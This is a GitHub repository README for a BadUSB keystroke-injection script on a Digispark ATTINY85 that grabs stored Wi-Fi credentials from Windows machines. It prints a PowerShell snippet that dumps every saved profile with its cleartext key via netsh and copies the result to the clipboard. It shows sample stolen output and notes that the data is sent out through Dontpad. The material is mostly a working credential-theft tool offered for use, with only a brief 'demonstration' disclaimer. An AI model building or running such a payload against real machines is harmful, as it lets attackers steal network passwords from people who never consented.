Skip to content

DragosRadut/Wifi-Profile-Grabber

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 

Repository files navigation

Wifi Profile Grabber

Description

This is a simple keystroke injection script designed for grabbing user's wifi credentials.

Specifications

  • Hardware = Digispark ATTINY85
  • Platform = Windows (PowerShell)
  • Implementation = Arduino script

Implementation

Script uses standard delay and keystoke commands. Inserting the bad usb will open PowerShell window. Credentials are obtained using the following simplified script:

$a = (netsh wlan show profiles) | Select-String ' :(.*)' // store all found profiles
$count = 1
$out = while($a.matches.groups[$count].value) { netsh wlan show profiles $a.matches.groups[$count].value.Trim() key=clear; $count+=2}
write-output $out | clip // copy to clipboard

Can be replaced with Hak5's one-liner.

Output

Script will grab data of all stored wifi credentials from attacked machine. The following example showcases one profile:

Profile K. on interface Wi-Fi: 
======================================================================= 

Applied: All User Profile    

Profile information 
------------------- 
    Version                : 1
    Type                   : Wireless LAN
    Name                   : K.
    Control options        : 
        Connection mode    : Connect automatically
        Network broadcast  : Connect only if this network is broadcasting
        AutoSwitch         : Do not switch to other networks
        MAC Randomization  : Disabled

Connectivity settings 
--------------------- 
    Number of SSIDs        : 1
    SSID name              : "K."
    Network type           : Infrastructure
    Radio type             : [ Any Radio Type ]
    Vendor extension          : Not present

Security settings 
----------------- 
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Authentication         : WPA2-Personal
    Cipher                 : GCMP
    Security key           : Present
    Key Content            : <PASSWORD>

Cost settings 
------------- 
    Cost                   : Fixed
    Congested              : No
    Approaching Data Limit : No
    Over Data Limit        : No
    Roaming                : No
    Cost Source            : Operator

Limitations

  • Exfiltrating data: implementation recovers data from attacked machine using Dontpad (assuming internet connection).
  • Delay: differences between tested machines showed that applied delay between keystrokes may be too low resulting in skipping script steps.
  • Demonstration purposes only: commands executed are visible on attacked machine.

Releases

No releases published

Packages

No packages published

Languages